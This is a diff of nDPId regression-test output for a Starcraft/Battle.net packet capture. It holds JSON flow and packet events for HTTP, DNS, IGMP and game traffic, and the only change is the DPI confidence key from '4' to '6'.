00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":643,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985925,"flow_last_seen":1437389985925,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985925,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3533,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -233,85 +233,85 @@ 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1437389985929,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985929,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLOhAAIAG2ofAqAFkAuQucA3JAFBxSWFd4DDjTFAQAQAXNwAA"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1437389985930,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985930,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDcrPCIDOdHB\/2oASOQjwXgAAAgQFtAEBBAIBAwMF"} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1437389985930,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985930,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLOlAAIAG2obAqAFkAuQucA3KAFB0cH\/azwiAz1AQAQBpNwAA"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":650,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985898,"flow_last_seen":1437389985931,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985931,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3529,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/yf\/YF9PRCZXJVPZ1428591254317.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":651,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985898,"flow_last_seen":1437389985945,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985945,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3530,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/0x\/0XQ1VXR8ZR271434128527471.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":650,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985898,"flow_last_seen":1437389985931,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985931,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3529,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/yf\/YF9PRCZXJVPZ1428591254317.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":651,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985898,"flow_last_seen":1437389985945,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985945,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3530,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/0x\/0XQ1VXR8ZR271434128527471.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":652,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1437389985955,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985955,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDcsAWb5HysuLTYASOQgfxgAAAgQFtAEBBAIBAwMF"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":653,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1437389985955,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985955,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLOxAAIAG2oPAqAFkAuQucA3LAFDKy4tNAFm+SFAQAQCYngAA"} -00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":654,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985892,"flow_last_seen":1437389985955,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1437389985955,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3528,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_thumbnail\/4j\/4J7OUIISCLTQ1436943629210.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":655,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985923,"flow_last_seen":1437389985955,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985955,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3531,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/fa\/FA512IPUN0SE1436979936388.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":654,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985892,"flow_last_seen":1437389985955,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1437389985955,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3528,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_thumbnail\/4j\/4J7OUIISCLTQ1436943629210.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":655,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985923,"flow_last_seen":1437389985955,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985955,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3531,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/fa\/FA512IPUN0SE1436979936388.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":657,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1437389985957,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985957,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDcy5z5mcpluU3oASOQil2AAAAgQFtAEBBAIBAwMF"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":658,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1437389985957,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985957,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLO9AAIAG2oDAqAFkAuQucA3MAFCmW5Teuc+ZnVAQAQAesQAA"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":675,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985960,"flow_last_seen":1437389985960,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985960,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3534,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1437389985960,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985960,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LPVAAIAG2m7AqAFkAuQucA3OAFAbejKQAAAAAIACIAD\/hwAAAgQFtAEDAwgBAQQC"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":680,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985925,"flow_last_seen":1437389985961,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985961,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3532,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/78\/78XH2UNU4JYK1434560551687.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":680,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985925,"flow_last_seen":1437389985961,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985961,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3532,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/78\/78XH2UNU4JYK1434560551687.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1437389985962,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985962,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDc1+R6dFIysb3oASOQjP5wAAAgQFtAEBBAIBAwMF"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1437389985962,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985962,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLPpAAIAG2nXAqAFkAuQucA3NAFAjKxvefkenRlAQAQBIwAAA"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985925,"flow_last_seen":1437389985962,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985962,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3533,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/mf\/MFTH8TS42HKX1430183778319.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985925,"flow_last_seen":1437389985962,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985962,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3533,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/mf\/MFTH8TS42HKX1430183778319.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982769,"flow_last_seen":1437389982825,"flow_idle_time":200000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"62.115.246.51","src_port":53146,"dst_port":1119,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Starcraft","breed":"Fun","category":"Game"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982769,"flow_last_seen":1437389982825,"flow_idle_time":200000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"62.115.246.51","src_port":53146,"dst_port":1119,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389961548,"flow_last_seen":1437389961598,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"64.233.184.188","src_port":2759,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389961548,"flow_last_seen":1437389961598,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"64.233.184.188","src_port":2759,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389955932,"flow_last_seen":1437389955967,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"216.58.212.110","src_port":3052,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389955932,"flow_last_seen":1437389955967,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"216.58.212.110","src_port":3052,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389981134,"flow_last_seen":1437389981218,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":53145,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00703{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1437389964518,"flow_last_seen":1437389964635,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":777,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3506,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"}} -00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1437389976946,"flow_last_seen":1437389980126,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.107","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389981134,"flow_last_seen":1437389981218,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":53145,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00703{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1437389964518,"flow_last_seen":1437389964635,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":777,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3506,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"}} +00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1437389976946,"flow_last_seen":1437389980126,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.107","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1437389958129,"flow_last_seen":1437389968685,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.208.193","src_port":3427,"dst_port":1119,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Starcraft","breed":"Fun","category":"Game"}} 00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1437389958129,"flow_last_seen":1437389968685,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.208.193","src_port":3427,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389985821,"flow_last_seen":1437389985912,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":388,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":55468,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389985821,"flow_last_seen":1437389985912,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":388,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":55468,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389968488,"flow_last_seen":1437389968521,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3484,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 